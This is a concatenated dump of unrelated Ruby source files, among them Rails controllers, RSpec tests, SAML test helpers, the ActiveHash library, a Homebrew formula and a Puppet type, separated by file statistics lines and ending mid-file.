module Workflow::Addon module Branch extend ActiveSupport::Concern extend SS::Addon included do attr_accessor :in_branch define_model_callbacks :merge_branch field :master_id, type: Integer belongs_to :master, foreign_key: "master_id", class_name: self.to_s has_many :branches, foreign_key: "master_id", class_name: self.to_s, dependent: :destroy permit_params :master_id validate :validate_master_lock, if: ->{ branch? } before_save :seq_clone_filename, if: ->{ new_clone? && basename.blank? } after_save :merge_to_master define_method(:master?) { master.blank? } define_method(:branch?) { master.present? } end def new_clone? @new_clone == true end def cloned_name? prefix = I18n.t("workflow.cloned_name_prefix") name =~ /^\[#{::Regexp.escape(prefix)}\]/ end def new_clone(attributes = {}) attributes = self.attributes.merge(attributes).select { |k| self.fields.key?(k) } self.fields.select { |n, v| (v.options.dig(:metadata, :branch) == false) }.each do |n, v| attributes.delete(n) end item = self.class.new(attributes) item.id = nil item.state = "closed" item.cur_user = @cur_user item.cur_site = @cur_site item.cur_node = @cur_node if attributes[:filename].nil? item.filename = "#{dirname}/" item.basename = "" end item.workflow_user_id = nil item.workflow_state = nil item.workflow_comment = nil item.workflow_approvers = nil item.workflow_required_counts = nil if item.is_a?(Cms::Addon::EditLock) item.lock_owner_id = nil item.lock_until = nil end if item.is_a?(Cms::Addon::Form::Page) item.copy_column_values(self) end item.instance_variable_set(:@new_clone, true) item end def clone_files run_callbacks(:clone_files) do ids = {} files.each do |f| ids[f.id] = clone_file(f).id end self.file_ids = ids.values ids end end def clone_file(f) attributes = Hash[f.attributes] attributes.select!{ |k| f.fields.key?(k) } file = SS::File.new(attributes) file.id = nil file.in_file = f.uploaded_file file.user_id = @cur_user.id if @cur_user file.save validate: false if respond_to?(:html) && html.present? html = self.html html.gsub!("=\"#{f.url}\"", "=\"#{file.url}\"") html.gsub!("=\"#{f.thumb_url}\"", "=\"#{file.thumb_url}\"") self.html = html end if respond_to?(:body_parts) && body_parts.present? self.body_parts = body_parts.map do |html| html = html.to_s html = html.gsub("=\"#{f.url}\"", "=\"#{file.url}\"") html = html.gsub("=\"#{f.thumb_url}\"", "=\"#{file.thumb_url}\"") html end end file end def clone_thumb run_callbacks(:clone_thumb) do return if thumb.blank? self.thumb = clone_file(thumb) thumb end end # backwards compatibility def merge(branch) Rails.logger.warn( 'DEPRECATION WARNING:' \ ' merge is deprecated and will be removed in future version (user merge_branch instead).' ) self.in_branch = branch self.merge_branch end def merge_branch return unless in_branch run_callbacks(:merge_branch) do self.reload attributes = {} in_branch_attributes = in_branch.attributes.to_h self.fields.each do |k, v| next if k == "_id" next if k == "filename" next if v.options.dig(:metadata, :branch) == false attributes[k] = in_branch_attributes[k] end self.attributes = attributes self.master_id = nil self.allow_other_user_files if respond_to?(:allow_other_user_files) end self.save end def merge_to_master return unless branch? return unless state == "public" master = self.master master.cur_user = @cur_user master.cur_site = @cur_site master.in_branch = self master.merge_branch master.generate_file end private def serve_static_file? return false if branch? super end def validate_filename super unless new_clone? end def seq_clone_filename self.filename ||= "" self.filename = dirname ? "#{dirname}#{id}.html" : "#{id}.html" end def validate_master_lock return if !master.respond_to?("locked?") return if self.state != "public" if master.locked? && !master.lock_owned?(@cur_user) errors.add :base, :locked, user: master.lock_owner.long_name end end end end
25.335079
97
0.598884
edc5c31d6fc2dd2613fd87c631acaf513d6e046a
2,998
require 'rails_helper' RSpec.describe Api::V1::TourPointsController, :type => :controller do render_views describe "POST create" do let!(:user) { FactoryBot.create :pro_user } let!(:tour) { FactoryBot.create :tour } let!(:tour_point) { FactoryBot.build :tour_point } context "within existing tour" do before { post 'create', params: { tour_id: tour.id, token: user.token, tour_points: [{latitude: tour_point.latitude, longitude: tour_point.longitude, passing_time: tour_point.passing_time.iso8601(3)}], :format => :json } } it { expect(response.status).to eq(201) } it { expect(JSON.parse(response.body)).to eq({"status"=>"ok"}) } end context "tour has no location" do before { post 'create', params: { tour_id: tour.id, token: user.token, tour_points: [{latitude: tour_point.latitude, longitude: tour_point.longitude, passing_time: tour_point.passing_time.iso8601(3)}], :format => :json } } it { expect(tour.reload.longitude).to eq(tour_point.longitude) } it { expect(tour.reload.latitude).to eq(tour_point.latitude) } end context "tour has location" do let!(:tour_with_location) { FactoryBot.create(:tour, latitude: 2, longitude: 3) } before { post 'create', params: { tour_id: tour_with_location.id, token: user.token, tour_points: [{latitude: tour_point.latitude, longitude: tour_point.longitude, passing_time: tour_point.passing_time.iso8601(3)}], :format => :json } } it { expect(tour_with_location.reload.longitude).to eq(3.0) } it { expect(tour_with_location.reload.latitude).to eq(2.0) } end context "with multiple tour points" do before { post 'create', params: { tour_id: tour.id, token: user.token, tour_points: [{latitude: tour_point.latitude, longitude: tour_point.longitude, passing_time: tour_point.passing_time.iso8601(3)}, {latitude: tour_point.latitude, longitude: tour_point.longitude, passing_time: tour_point.passing_time.iso8601(3)}], :format => :json } } it { expect(response.status).to eq(201) } it { expect(JSON.parse(response.body)).to eq({"status"=>"ok"}) } end context "with inexisting tour" do it { expect { post 'create', params: { tour_id: 0, token: user.token, tour_points: [{latitude: tour_point.latitude, longitude: tour_point.longitude, passing_time: tour_point.passing_time}], :format => :json } }.to raise_error(ActiveRecord::RecordNotFound) } end context "with invalid tour_point" do before { post 'create', params: { tour_id: tour.id, token: user.token, tour_points: [{latitude: "ABC", longitude: "DEF", passing_time: "GHI"}], :format => :json } } it { expect(response.status).to eq(400) } end context "with missing passing time" do it "raises exception" do expect { post 'create', params: { tour_id: tour.id, token: user.token, tour_points: {latitude: "ABC", longitude: "DEF"} } }.to raise_error end end end end
52.596491
344
0.679787
87b4383fa959934e83421341784d3c398513e517
1,176
require 'fog/ecloud/models/compute/template' module Fog module Compute class Ecloud class Templates < Fog::Ecloud::Collection identity :href model Fog::Compute::Ecloud::Template def all r_data = [] data = connection.get_templates(href).body[:Families] data[:Family].is_a?(Hash) ? data = [data[:Family]] : data = data[:Family] data.each do |d| d[:Categories][:Category].each do |cat| cat[:OperatingSystems][:OperatingSystem].is_a?(Hash) ? cat = [cat[:OperatingSystems][:OperatingSystem]] : cat = cat[:OperatingSystems][:OperatingSystem] cat.each do |os| os[:Templates][:Template].is_a?(Hash) ? os = [os[:Templates][:Template]] : os = os[:Templates][:Template] os.each do |template| r_data << template end end end end load(r_data) end def get(uri) if data = connection.get_template(uri) new(data.body) end rescue Fog::Errors::NotFound nil end end end end end
28.682927
166
0.535714
3827053c7bd36c28f7f11563559ecd15f58a1c51
562
# frozen_string_literal: false # = uri/wss.rb # # Author:: Matt Muller <[email protected]> # License:: You can redistribute it and/or modify it under the same term as Ruby. # # See Bundler::URI for general documentation # require_relative 'ws' module Bundler::URI # The default port for WSS URIs is 443, and the scheme is 'wss:' rather # than 'ws:'. Other than that, WSS URIs are identical to WS URIs; # see Bundler::URI::WS. class WSS < WS # A Default port of 443 for Bundler::URI::WSS DEFAULT_PORT = 443 end @@schemes['WSS'] = WSS end
24.434783
81
0.692171
7a65cd6d88ecb1456b75a757428b103ab6e8c7b9
13,266
module ActiveHash class RecordNotFound < StandardError end class ReservedFieldError < StandardError end class IdError < StandardError end class FileTypeMismatchError < StandardError end class Base class_attribute :_data, :dirty, :default_attributes class WhereChain def initialize(scope) @scope = scope @records = @scope.all end def not(options) return @records if options.blank? # use index if searching by id if options.key?(:id) || options.key?("id") ids = @scope.pluck(:id) - Array.wrap(options.delete(:id) || options.delete("id")) candidates = ids.map { |id| @scope.find_by_id(id) }.compact end return candidates if options.blank? (candidates || @records || []).reject do |record| match_options?(record, options) end end def match_options?(record, options) options.all? do |col, match| if match.kind_of?(Array) match.any? { |v| normalize(v) == normalize(record[col]) } else normalize(record[col]) == normalize(match) end end end private :match_options? def normalize(v) v.respond_to?(:to_sym) ? v.to_sym : v end private :normalize end if Object.const_defined?(:ActiveModel) extend ActiveModel::Naming include ActiveModel::Conversion else def to_param id.present? ? id.to_s : nil end end class << self def cache_key if Object.const_defined?(:ActiveModel) model_name.cache_key else ActiveSupport::Inflector.tableize(self.name).downcase end end def primary_key "id" end def field_names @field_names ||= [] end def the_meta_class class << self self end end def compute_type(type_name) self end def pluralize_table_names true end def empty? false end def data _data end def data=(array_of_hashes) mark_dirty @records = nil reset_record_index self._data = array_of_hashes if array_of_hashes auto_assign_fields(array_of_hashes) array_of_hashes.each do |hash| insert new(hash) end end end def exists?(record) if record.id.present? record_index[record.id.to_s].present? end end def insert(record) @records ||= [] record[:id] ||= next_id validate_unique_id(record) if dirty mark_dirty add_to_record_index({ record.id.to_s => @records.length }) @records << record end def next_id max_record = all.max { |a, b| a.id <=> b.id } if max_record.nil? 1 elsif max_record.id.is_a?(Numeric) max_record.id.succ end end def record_index @record_index ||= {} end private :record_index def reset_record_index record_index.clear end private :reset_record_index def add_to_record_index(entry) record_index.merge!(entry) end private :add_to_record_index def validate_unique_id(record) raise IdError.new("Duplicate ID found for record #{record.attributes.inspect}") if record_index.has_key?(record.id.to_s) end private :validate_unique_id def create(attributes = {}) record = new(attributes) record.save mark_dirty record end alias_method :add, :create def create!(attributes = {}) record = new(attributes) record.save! record end def all(options={}) if options.has_key?(:conditions) where(options[:conditions]) else @records ||= [] end end def where(options = :chain) if options == :chain return WhereChain.new(self) elsif options.blank? return @records end # use index if searching by id if options.key?(:id) || options.key?("id") ids = (options.delete(:id) || options.delete("id")) candidates = Array.wrap(ids).map { |id| find_by_id(id) }.compact end return candidates if options.blank? (candidates || @records || []).select do |record| match_options?(record, options) end end def find_by(options) where(options).first end def find_by!(options) find_by(options) || (raise RecordNotFound.new("Couldn't find #{name}")) end def match_options?(record, options) options.all? do |col, match| if match.kind_of?(Array) match.any? { |v| normalize(v) == normalize(record[col]) } else normalize(record[col]) == normalize(match) end end end private :match_options? def normalize(v) v.respond_to?(:to_sym) ? v.to_sym : v end private :normalize def count all.length end def pluck(*column_names) column_names.map { |column_name| all.map(&column_name.to_sym) }.inject(&:zip) end def transaction yield rescue LocalJumpError => err raise err rescue StandardError => e unless Object.const_defined?(:ActiveRecord) && e.is_a?(ActiveRecord::Rollback) raise e end end def delete_all mark_dirty reset_record_index @records = [] end def find(id, * args) case id when nil nil when :all all when :first all(*args).first when Array id.map { |i| find(i) } else find_by_id(id) || begin raise RecordNotFound.new("Couldn't find #{name} with ID=#{id}") end end end def find_by_id(id) index = record_index[id.to_s] index and @records[index] end delegate :first, :last, :to => :all def fields(*args) options = args.extract_options! args.each do |field| field(field, options) end end def field(field_name, options = {}) validate_field(field_name) field_names << field_name add_default_value(field_name, options[:default]) if options[:default] define_getter_method(field_name, options[:default]) define_setter_method(field_name) define_interrogator_method(field_name) define_custom_find_method(field_name) define_custom_find_all_method(field_name) end def validate_field(field_name) if [:attributes].include?(field_name.to_sym) raise ReservedFieldError.new("#{field_name} is a reserved field in ActiveHash. Please use another name.") end end private :validate_field def respond_to?(method_name, include_private=false) super || begin config = configuration_for_custom_finder(method_name) config && config[:fields].all? do |field| field_names.include?(field.to_sym) || field.to_sym == :id end end end def method_missing(method_name, *args) return super unless respond_to? method_name config = configuration_for_custom_finder(method_name) attribute_pairs = config[:fields].zip(args) matches = all.select { |base| attribute_pairs.all? { |field, value| base.send(field).to_s == value.to_s } } if config[:all?] matches else result = matches.first if config[:bang?] result || raise(RecordNotFound, "Couldn\'t find #{name} with #{attribute_pairs.collect { |pair| "#{pair[0]} = #{pair[1]}" }.join(', ')}") else result end end end def configuration_for_custom_finder(finder_name) if finder_name.to_s.match(/^find_(all_)?by_(.*?)(!)?$/) && !($1 && $3) { :all? => !!$1, :bang? => !!$3, :fields => $2.split('_and_') } end end private :configuration_for_custom_finder def add_default_value field_name, default_value self.default_attributes ||= {} self.default_attributes[field_name] = default_value end def define_getter_method(field, default_value) unless instance_methods.include?(field.to_sym) define_method(field) do attributes[field].nil? ? default_value : attributes[field] end end end private :define_getter_method def define_setter_method(field) method_name = :"#{field}=" unless instance_methods.include?(method_name) define_method(method_name) do |new_val| @attributes[field] = new_val end end end private :define_setter_method def define_interrogator_method(field) method_name = :"#{field}?" unless instance_methods.include?(method_name) define_method(method_name) do send(field).present? end end end private :define_interrogator_method def define_custom_find_method(field_name) method_name = :"find_by_#{field_name}" unless singleton_methods.include?(method_name) the_meta_class.instance_eval do define_method(method_name) do |*args| args.extract_options! identifier = args[0] all.detect { |record| record.send(field_name) == identifier } end end end end private :define_custom_find_method def define_custom_find_all_method(field_name) method_name = :"find_all_by_#{field_name}" unless singleton_methods.include?(method_name) the_meta_class.instance_eval do unless singleton_methods.include?(method_name) define_method(method_name) do |*args| args.extract_options! identifier = args[0] all.select { |record| record.send(field_name) == identifier } end end end end end private :define_custom_find_all_method def auto_assign_fields(array_of_hashes) (array_of_hashes || []).inject([]) do |array, row| row.symbolize_keys! row.keys.each do |key| unless key.to_s == "id" array << key end end array end.uniq.each do |key| field key end end private :auto_assign_fields # Needed for ActiveRecord polymorphic associations def base_class ActiveHash::Base end # Needed for ActiveRecord polymorphic associations(rails/rails#32148) def polymorphic_name base_class.name end def reload reset_record_index self.data = _data mark_clean end private :reload def mark_dirty self.dirty = true end private :mark_dirty def mark_clean self.dirty = false end private :mark_clean end def initialize(attributes = {}) attributes.symbolize_keys! @attributes = attributes attributes.dup.each do |key, value| send "#{key}=", value end yield self if block_given? end def attributes if self.class.default_attributes (self.class.default_attributes.merge @attributes).freeze else @attributes end end def [](key) attributes[key] end def _read_attribute(key) attributes[key] end alias_method :read_attribute, :_read_attribute def []=(key, val) @attributes[key] = val end def id attributes[:id] ? attributes[:id] : nil end def id=(id) @attributes[:id] = id end alias quoted_id id def new_record? !self.class.all.include?(self) end def destroyed? false end def persisted? self.class.all.map(&:id).include?(id) end def readonly? true end def eql?(other) other.instance_of?(self.class) and not id.nil? and (id == other.id) end alias == eql? def hash id.hash end def cache_key case when new_record? "#{self.class.cache_key}/new" when timestamp = self[:updated_at] "#{self.class.cache_key}/#{id}-#{timestamp.to_s(:number)}" else "#{self.class.cache_key}/#{id}" end end def errors obj = Object.new def obj.[](key) [] end def obj.full_messages() [] end obj end def save(*args) unless self.class.exists?(self) self.class.insert(self) end true end alias save! save def valid? true end def marked_for_destruction? false end end end
22.833046
149
0.566637
39dc66ed56005e04433cc0bc017df64d961c25f1
910
module StubApiRequestHelper class MissingFixtureError < StandardError end REQUEST_HEADERS = { 'Accept' =>'application/json', 'Authorization' =>'Basic a2F0YW5hOnNlY3JldA==', 'Content-Type' =>'application/json' }.freeze def stub_api_request(verb, path, options = {}) file_name = options.delete(:fixture) || "#{verb}-#{path}" file_path = File.join("spec", "fixtures", "responses", "#{file_name}.json") unless File.exist?(file_path) raise MissingFixtureError, "#{file_name} not found. Did you forget to create #{file_path}" end body_file = File.read(file_path) body_json = JSON.parse(body_file) code = verb == :post ? 201 : 200 stub_request(verb, "https://api.sandbox.evvnt.com/#{path}.json"). with(headers: REQUEST_HEADERS, query: options[:params]). to_return(status: code, body: body_file, headers: {}) end end
35
79
0.654945
2673a066fc429a6dd8e78c361a87a80d37078dbc
991
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: google/ads/google_ads/v1/enums/brand_safety_suitability.proto require 'google/protobuf' require 'google/api/annotations_pb' Google::Protobuf::DescriptorPool.generated_pool.build do add_message "google.ads.googleads.v1.enums.BrandSafetySuitabilityEnum" do end add_enum "google.ads.googleads.v1.enums.BrandSafetySuitabilityEnum.BrandSafetySuitability" do value :UNSPECIFIED, 0 value :UNKNOWN, 1 value :EXPANDED_INVENTORY, 2 value :STANDARD_INVENTORY, 3 value :LIMITED_INVENTORY, 4 end end module Google::Ads::GoogleAds::V1::Enums BrandSafetySuitabilityEnum = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v1.enums.BrandSafetySuitabilityEnum").msgclass BrandSafetySuitabilityEnum::BrandSafetySuitability = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v1.enums.BrandSafetySuitabilityEnum.BrandSafetySuitability").enummodule end
43.086957
203
0.816347
5d4cc65157a5fc83f77807070ca3a6232b4f8176
8,126
require 'saml_idp_constants' ## GET /api/saml/auth helper methods module SamlAuthHelper def saml_settings settings = OneLogin::RubySaml::Settings.new # SP settings settings.assertion_consumer_service_url = 'http://localhost:3000/test/saml/decode_assertion' settings.assertion_consumer_logout_service_url = 'http://localhost:3000/test/saml/decode_slo_request' settings.certificate = saml_test_sp_cert settings.private_key = saml_test_sp_key settings.authn_context = Saml::Idp::Constants::IAL1_AUTHN_CONTEXT_CLASSREF # SP + IdP Settings settings.issuer = 'http://localhost:3000' settings.security[:authn_requests_signed] = true settings.security[:logout_requests_signed] = true settings.security[:embed_sign] = true settings.security[:digest_method] = 'http://www.w3.org/2001/04/xmlenc#sha256' settings.security[:signature_method] = 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256' settings.name_identifier_format = 'urn:oasis:names:tc:SAML:2.0:nameid-format:persistent' settings.double_quote_xml_attribute_values = true # IdP setting settings.idp_sso_target_url = "http://#{Figaro.env.domain_name}/api/saml/auth2019" settings.idp_slo_target_url = "http://#{Figaro.env.domain_name}/api/saml/logout2019" settings.idp_cert_fingerprint = idp_fingerprint settings.idp_cert_fingerprint_algorithm = 'http://www.w3.org/2001/04/xmlenc#sha256' settings end def sp_fingerprint @sp_fingerprint ||= Fingerprinter.fingerprint_cert( OpenSSL::X509::Certificate.new(saml_test_sp_cert), ) end def idp_fingerprint @idp_fingerprint ||= Fingerprinter.fingerprint_cert( OpenSSL::X509::Certificate.new(saml_test_idp_cert), ) end def saml_test_sp_key @private_key ||= OpenSSL::PKey::RSA.new( File.read(Rails.root + 'keys/saml_test_sp.key'), ).to_pem end def saml_test_idp_cert @saml_test_idp_cert ||= File.read(Rails.root.join('certs', 'saml2019.crt')) end def saml_test_sp_cert @saml_test_sp_cert ||= File.read(Rails.root.join('certs', 'sp', 'saml_test_sp.crt')) end def auth_request @auth_request ||= OneLogin::RubySaml::Authrequest.new end def authnrequest_get auth_request.create(saml_spec_settings) end def saml_spec_settings settings = saml_settings.dup settings.issuer = 'http://localhost:3000' settings end def invalid_authn_context_settings settings = saml_settings.dup settings.authn_context = 'http://idmanagement.gov/ns/assurance/loa/5' settings end def invalid_service_provider_settings settings = saml_settings.dup settings.issuer = 'invalid_provider' settings end def invalid_service_provider_and_authn_context_settings settings = saml_settings.dup settings.authn_context = 'http://idmanagement.gov/ns/assurance/loa/5' settings.issuer = 'invalid_provider' settings end def sp1_saml_settings settings = saml_settings.dup settings.issuer = 'https://rp1.serviceprovider.com/auth/saml/metadata' settings end def sp2_saml_settings settings = saml_settings.dup settings.issuer = 'https://rp2.serviceprovider.com/auth/saml/metadata' settings end def email_nameid_saml_settings_for_allowed_issuer settings = saml_settings.dup settings.name_identifier_format = 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress' settings.issuer = 'https://rp1.serviceprovider.com/auth/saml/metadata' settings end def email_nameid_saml_settings_for_disallowed_issuer settings = saml_settings.dup settings.name_identifier_format = 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress' settings end def ial2_saml_settings settings = sp1_saml_settings.dup settings.authn_context = Saml::Idp::Constants::IAL2_AUTHN_CONTEXT_CLASSREF settings end def loa3_saml_settings settings = sp1_saml_settings.dup settings.authn_context = Saml::Idp::Constants::LOA3_AUTHN_CONTEXT_CLASSREF settings end def ial2_with_bundle_saml_settings settings = ial2_saml_settings settings.authn_context = [ settings.authn_context, "#{Saml::Idp::Constants::REQUESTED_ATTRIBUTES_CLASSREF}first_name:last_name email, ssn", "#{Saml::Idp::Constants::REQUESTED_ATTRIBUTES_CLASSREF}phone", ] settings end def loa3_with_bundle_saml_settings settings = loa3_saml_settings settings.authn_context = [ settings.authn_context, "#{Saml::Idp::Constants::REQUESTED_ATTRIBUTES_CLASSREF}first_name:last_name email, ssn", "#{Saml::Idp::Constants::REQUESTED_ATTRIBUTES_CLASSREF}phone", ] settings end def ial1_with_bundle_saml_settings settings = sp1_saml_settings settings.authn_context = [ settings.authn_context, "#{Saml::Idp::Constants::REQUESTED_ATTRIBUTES_CLASSREF}first_name:last_name email, ssn", "#{Saml::Idp::Constants::REQUESTED_ATTRIBUTES_CLASSREF}phone", ] settings end def sp1_authnrequest auth_request.create(sp1_saml_settings) end def sp2_authnrequest auth_request.create(sp2_saml_settings) end def ial2_authnrequest auth_request.create(ial2_saml_settings) end def missing_authn_context_saml_settings settings = saml_settings.dup settings.authn_context = nil settings end def saml_test_key @saml_test_key ||= File.read(Rails.root.join('keys', 'saml_test_sp.key')) end # generates a SAML response and returns a parsed Nokogiri XML document def generate_saml_response(user, settings = saml_settings, link: true) # user needs to be signed in in order to generate an assertion link_user_to_identity(user, link, settings) sign_in(user) saml_get_auth(settings) end def saml_get_auth(settings) # GET redirect binding Authn Request get :auth, params: { SAMLRequest: CGI.unescape(saml_request(settings)) } end def saml_post_auth(saml_request) # POST redirect binding Authn Request post :auth, params: { SAMLRequest: CGI.unescape(saml_request) } end private def link_user_to_identity(user, link, settings) return unless link IdentityLinker.new( user, settings.issuer, ).link_identity( ial: ial2_requested?(settings) ? true : nil, verified_attributes: ['email'], ) end def ial2_requested?(settings) settings.authn_context != Saml::Idp::Constants::IAL1_AUTHN_CONTEXT_CLASSREF end def saml_request(settings) authn_request(settings).split('SAMLRequest=').last end # generate a SAML Authn request def authn_request(settings = saml_settings, params = {}) OneLogin::RubySaml::Authrequest.new.create(settings, params) end # :reek:UncommunicativeMethodName, :reek:ControlParameter def visit_idp_from_sp_with_ial1(sp) if sp == :saml @saml_authn_request = auth_request.create(saml_settings) visit @saml_authn_request elsif sp == :oidc @state = SecureRandom.hex @client_id = 'urn:gov:gsa:openidconnect:sp:server' @nonce = SecureRandom.hex visit_idp_from_oidc_sp_with_ial1(state: @state, client_id: @client_id, nonce: @nonce) end end # :reek:UncommunicativeMethodName def visit_idp_from_oidc_sp_with_ial1(state: SecureRandom.hex, client_id:, nonce:) visit openid_connect_authorize_path( client_id: client_id, response_type: 'code', acr_values: Saml::Idp::Constants::IAL1_AUTHN_CONTEXT_CLASSREF, scope: 'openid email', redirect_uri: 'http://localhost:7654/auth/result', state: state, prompt: 'select_account', nonce: nonce, ) end def visit_idp_from_oidc_sp_with_loa1_prompt_login state = SecureRandom.hex client_id = 'urn:gov:gsa:openidconnect:sp:server' nonce = SecureRandom.hex visit openid_connect_authorize_path( client_id: client_id, response_type: 'code', acr_values: Saml::Idp::Constants::LOA1_AUTHN_CONTEXT_CLASSREF, scope: 'openid email', redirect_uri: 'http://localhost:7654/auth/result', state: state, prompt: 'login', nonce: nonce, ) end end
30.208178
105
0.733079
e21ee06188dd4c00a443ad6f7a4932daf49780fe
304
class Rpush260Updates < ActiveRecord::VERSION::MAJOR >= 5 ? ActiveRecord::Migration[5.0] : ActiveRecord::Migration def self.up add_column :rpush_notifications, :content_available, :boolean, default: false end def self.down remove_column :rpush_notifications, :content_available end end
27.636364
114
0.763158
f83b4abd1e2f8753cd4ffd9ccb291505884ed6db
800
class Profiles::PreferencesController < Profiles::ApplicationController before_action :user def show end def update begin if @user.update_attributes(preferences_params) flash[:notice] = 'Preferences saved.' else flash[:alert] = 'Failed to save preferences.' end rescue ArgumentError => e # Raised when `dashboard` is given an invalid value. flash[:alert] = "Failed to save preferences (#{e.message})." end respond_to do |format| format.html { redirect_to profile_preferences_path } format.js end end private def user @user = current_user end def preferences_params params.require(:user).permit( :color_scheme_id, :dashboard, :project_view, :theme_id ) end end
20
71
0.65
28d5a71bc2b37b62568e4b1a383446ef434f9994
2,827
require 'yaml' module Readspeed class Tracker attr_accessor :file_name def initialize(title, input: $stdin, output: $stdout) @input = input @output = output @pages = 0 @times = [] @title = title end def start output.puts "#{help_info}\n Starting recording. Press [ENTER] when you finish reading page." while true do start_time = Time.now case read_command when :quit write_summary_to_file break when :pause @paused = true when :resume @paused = false when :help print_help else record_next_page(start_time, Time.now) end end end private attr_reader :input, :output COMMANDS = { quit: %w(q quit), pause: %w(p pause), resume: %w(r resume), help: %w(h help) } def expanded_commands COMMANDS.reduce({}) do |sum, (command, inputs)| inputs.each { |i| sum[i] = command } sum end end def read_command status = @paused ? "(paused)" : "#{@pages}" output.print "#{status}> " user_input = input.gets.chomp if @paused && user_input == '' @paused = false selected_command = :resume else selected_command = expanded_commands[user_input] end selected_command end def record_next_page(start_time, end_time) @pages += 1 @times << end_time - start_time output.puts summary end def help_info <<~EOS Press [ENTER] without typing anything to start next page or one of the following commands: q, quit - quit the application, write summary to file p, pause - record current page, pause r, resume - resume from pause h, help - show help (this) EOS end def write_summary_to_file output.puts "Writing summary to #{file_name}" if File.exist?(file_name) reading_summary = YAML.load(File.read(file_name)) else reading_summary = { title: @title, started_at: Time.now, readings: [] } end reading = { session_finished_at: Time.now, pages: @pages, times: @times, summary: summary } reading_summary[:readings] << reading File.open(file_name, 'w') { |f| f.write(reading_summary.to_yaml) } end def summary "Finished page #{@pages}. Last: #{last} Average: #{average} Total: #{total}" end def last @times.last.round(1) end def average (total / @pages).round(1) end def total @times.reduce(&:+).round(1) end def file_name @file_name || @title.gsub(/( )/, '_').downcase + ".yaml" end end end
22.085938
98
0.558543
e9352d5f65e8f1784c9e90cd7147fdc3293228ce
1,823
class ConsulTemplate < Formula desc "Generic template rendering and notifications with Consul" homepage "https://github.com/hashicorp/consul-template" url "https://github.com/hashicorp/consul-template.git", :tag => "v0.19.5", :revision => "f8c8205caf458dfd0ecab69d029ab112803aa587" head "https://github.com/hashicorp/consul-template.git" bottle do cellar :any_skip_relocation sha256 "921d8401cb88f770060bbe6f59eb5a0499764b8539b42682cddaaf8db526ecc2" => :mojave sha256 "859b8ac6cb1aaff1d1b7be4b41d0eef356d86634eb76a2601d3cce1626d03bb4" => :high_sierra sha256 "4bc3abb371cf2a3f6243800d7b9325a0479639d488a20911eff3ff11a68f2a15" => :sierra sha256 "dec98da73d913cf2a2d4364826427eb42dab3638d09ac198e7f9e449082aa8ad" => :el_capitan sha256 "f7d014f2a2e93fd5faa29c0e165293b12e735fba7ddcd085d88269b7ca0a3be6" => :x86_64_linux end depends_on "go" => :build def install ENV["GOPATH"] = buildpath arch = MacOS.prefer_64_bit? ? "amd64" : "386" ENV["XC_OS"] = "darwin" ENV["XC_ARCH"] = arch dir = buildpath/"src/github.com/hashicorp/consul-template" dir.install buildpath.children - [buildpath/".brew_home"] cd dir do project = "github.com/hashicorp/consul-template" commit = Utils.popen_read("git rev-parse --short HEAD").chomp ldflags = ["-X #{project}/version.Name=consul-template", "-X #{project}/version.GitCommit=#{commit}"] system "go", "build", "-o", bin/"consul-template", "-ldflags", ldflags.join(" ") prefix.install_metafiles end end test do (testpath/"template").write <<~EOS {{"homebrew" | toTitle}} EOS system bin/"consul-template", "-once", "-template", "template:test-result" assert_equal "Homebrew", (testpath/"test-result").read.chomp end end
38.787234
94
0.706528
79f419f3897fca804bb77470177aa98e8042a9b9
984
# == Schema Information # # Table name: flow_inds # # id :integer not null, primary key # flow_id :integer not null # ind_id :integer not null # value(Numeric value) :float not null # # Indexes # # flow_inds_flow_id_idx (flow_id) # flow_inds_flow_id_ind_id_key (flow_id,ind_id) UNIQUE # flow_inds_ind_id_idx (ind_id) # # Foreign Keys # # fk_rails_... (flow_id => flows.id) ON DELETE => cascade ON UPDATE => cascade # fk_rails_... (ind_id => inds.id) ON DELETE => cascade ON UPDATE => cascade # module Api module V3 class FlowInd < BlueTable belongs_to :flow belongs_to :ind def self.import_key [ {name: :flow_id, sql_type: 'INT'}, {name: :ind_id, sql_type: 'INT'} ] end def self.blue_foreign_keys [ {name: :ind_id, table_class: Api::V3::Ind} ] end end end end
23.428571
80
0.555894
216ff9db04fc9b05940a966a02c27a0762d3aef2
1,815
class GraphqlController < ApplicationController skip_forgery_protection if: :skip_csrf_protection? def execute variables = ensure_hash(params[:variables]) query = params[:query] operation_name = params[:operationName] context = { pundit_user: pundit_user, current_school: current_school, current_user: current_user, current_school_admin: current_school_admin, session: session, notifications: [], token_auth: api_token.present? } result = PupilfirstSchema.execute(query, variables: variables, context: context, operation_name: operation_name) # Inject notifications into the GraphQL response, if any. These should be manually handled by the client. result[:notifications] = context[:notifications] if context[:notifications].any? render json: result rescue => e raise e unless Rails.env.development? handle_error_in_development e end private def introspection? Rails.env.development? && params[:introspection] == 'true' end def skip_csrf_protection? introspection? || (api_token.present? && current_user.present?) end # Handle form data, JSON body, or a blank value def ensure_hash(ambiguous_param) case ambiguous_param when String if ambiguous_param.present? ensure_hash(JSON.parse(ambiguous_param)) else {} end when Hash, ActionController::Parameters ambiguous_param when nil {} else raise ArgumentError, "Unexpected parameter: #{ambiguous_param}" end end def handle_error_in_development(error) logger.error error.message logger.error error.backtrace.join("\n") render json: { error: { message: error.message, backtrace: error.backtrace }, data: {} }, status: :internal_server_error end end
27.5
124
0.707989
abaa33208a95458778805fc6bc8357115b4bfc73
5,281
# frozen_string_literal: true Puppet::Type.newtype(:mysql_grant) do @doc = <<-PUPPET @summary Manage a MySQL user's rights. PUPPET ensurable autorequire(:file) { '/root/.my.cnf' } autorequire(:mysql_user) { self[:user] } def initialize(*args) super # Forcibly munge any privilege with 'ALL' in the array to exist of just # 'ALL'. This can't be done in the munge in the property as that iterates # over the array and there's no way to replace the entire array before it's # returned to the provider. if self[:ensure] == :present && Array(self[:privileges]).size > 1 && self[:privileges].to_s.include?('ALL') self[:privileges] = 'ALL' end # Sort the privileges array in order to ensure the comparision in the provider # self.instances method match. Otherwise this causes it to keep resetting the # privileges. # rubocop:disable Style/MultilineBlockChain self[:privileges] = Array(self[:privileges]).map { |priv| # split and sort the column_privileges in the parentheses and rejoin if priv.include?('(') type, col = priv.strip.split(%r{\s+|\b}, 2) type.upcase + ' (' + col.slice(1...-1).strip.split(%r{\s*,\s*}).sort.join(', ') + ')' else priv.strip.upcase end }.uniq.reject { 